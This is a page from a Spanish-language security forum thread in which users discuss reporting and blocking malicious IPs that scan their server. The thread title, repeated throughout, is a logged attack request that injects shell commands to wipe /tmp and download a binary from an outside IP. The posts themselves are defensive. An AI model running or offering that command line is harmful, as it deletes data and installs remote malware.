elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] Ir Abajo Respuesta Imprimir
Autor Tema: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86  (Leído 19,030 veces)
Danielㅤ


Desconectado Desconectado

Mensajes: 1.869


🔵🔵🔵🔵🔵🔵🔵


Ver Perfil
Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
« Respuesta #20 en: 14 Enero 2021, 13:49 pm »
Me parece muy bien que ayudes a reportar las IPs maliciosas, conozco esa página y es muy buena por cierto.
Yo en mis tiempos usaba EfnetRBL y DroneBL.


Saludos
En línea
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.645


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
« Respuesta #21 en: 17 Enero 2021, 11:17 am »
Empiezan los reportes:

https://www.abuseipdb.com/user/52197

De momento intentos SSH fallidos (SSH Brute Force Attacks). Después añadiremos ataques FTP fuerza bruta y reglas mod_security.



Uno de las ip's que le encanta buscar por copias sql es el ASN Russia AS49505 SELECTEL. Bloqueado entero, porque su tráfico no hace otra cosa más que buscar vulnerabilidades

Y uno de los escaners utilizados es (User-Agent)

Código:
Nuclei - Open-source project (github.com/projectdiscovery/nuclei)
« Última modificación: 17 Enero 2021, 11:23 am por el-brujo » En línea
Danielㅤ


Desconectado Desconectado

Mensajes: 1.869


🔵🔵🔵🔵🔵🔵🔵


Ver Perfil
Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86
« Respuesta #22 en: 19 Enero 2021, 15:03 pm »
Bien brujo, más de 440 IPs reportadas hasta ahora! 


Saludos
En línea
Páginas: 1 2 [3] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
WGET
GNU/Linux 		Pirat3net 1 2,878 Último mensaje 22 Febrero 2012, 15:44 pm
por WHK
[PHP Shell] Poison Shell 1.0 (Version Identada)
Nivel Web 		BigBear 3 7,217 Último mensaje 15 Octubre 2012, 07:52 am
por ameise_1987
duda con wget
GNU/Linux 		WHK 3 3,830 Último mensaje 11 Enero 2013, 20:36 pm
por WHK
Que opinan de la moda de los bins ?
Dudas Generales 		bonjoviivan 1 4,321 Último mensaje 26 Marzo 2015, 07:49 am
por engel lex
Wget
Hacking 		makarov 0 2,619 Último mensaje 9 Octubre 2016, 15:14 pm
por makarov
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines